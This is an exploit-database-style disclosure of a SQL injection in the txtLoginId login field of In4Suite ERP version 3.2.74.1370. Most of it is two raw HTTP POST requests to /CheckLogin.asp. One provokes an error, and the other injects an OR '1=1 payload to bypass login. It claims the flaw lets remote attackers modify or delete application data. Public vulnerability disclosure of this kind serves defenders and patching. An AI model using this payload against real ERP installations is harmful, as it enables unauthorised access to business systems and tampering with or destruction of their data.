In4Suit ERP version 3.2.74.1370 suffers from a remote SQL injection vulnerability.
631db13ab8c6191f9561ffd9735c6f99
# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
# Date: 18/05/2021
# Exploit Author: Gulab Mondal
# Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html
# Version: In4Suite ERP 3.2.74.1370
# Tested on: Windows
-----------------------------------------
SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to
modify or delete data, causing persistent changes to the application's
content or behavior by using malicious SQL queries.
--------------
# Error condition
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1
txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "
# SQL Injection exploitation
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1
txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="
------------------------------